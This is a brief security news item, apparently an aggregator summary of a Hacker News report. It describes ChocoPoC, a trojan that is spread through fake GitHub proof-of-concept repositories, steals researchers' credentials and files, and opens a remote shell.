ChocoPoC RAT Targets Researchers With Fake Exploit Code
A new data-stealing trojan, identified as ChocoPoC, has been discovered targeting vulnerability researchers through deceptive proof-of-concept (PoC) exploit repositories on GitHub. These repositories are designed to mimic legitimate code that claims to exploit recently disclosed Common Vulnerabilities and Exposures (CVEs). When a researcher executes this malicious code, the ChocoPoC malware silently extracts sensitive information, including saved passwords, browser cookies, and various files from the victim's system. Following the data exfiltration, the malware establishes a remote shell, granting attackers unauthorized access and control over the compromised machine.
The distribution method leverages the trust vulnerability researchers place in PoC code shared on platforms like GitHub. By posing as legitimate exploit demonstrations for "hot new CVEs," attackers lure unsuspecting individuals into running the malware. This tactic capitalizes on the constant need for researchers to test and analyze new vulnerabilities to understand their impact and develop defenses. The compromise of a researcher's system could lead to further network intrusions or the theft of proprietary information related to their work.
While specific details regarding the initial discovery and attribution remain limited, the existence of ChocoPoC highlights a growing trend of sophisticated social engineering tactics employed by threat actors. The malware's ability to steal a wide range of sensitive data and establish persistent access underscores the significant risk posed to individuals and organizations involved in cybersecurity research and development. Security professionals are advised to exercise extreme caution when downloading and executing PoC code from unverified sources, even if they appear to be from reputable platforms like GitHub.
Original source — read the full reporting at the publisher:
Read on The Hacker News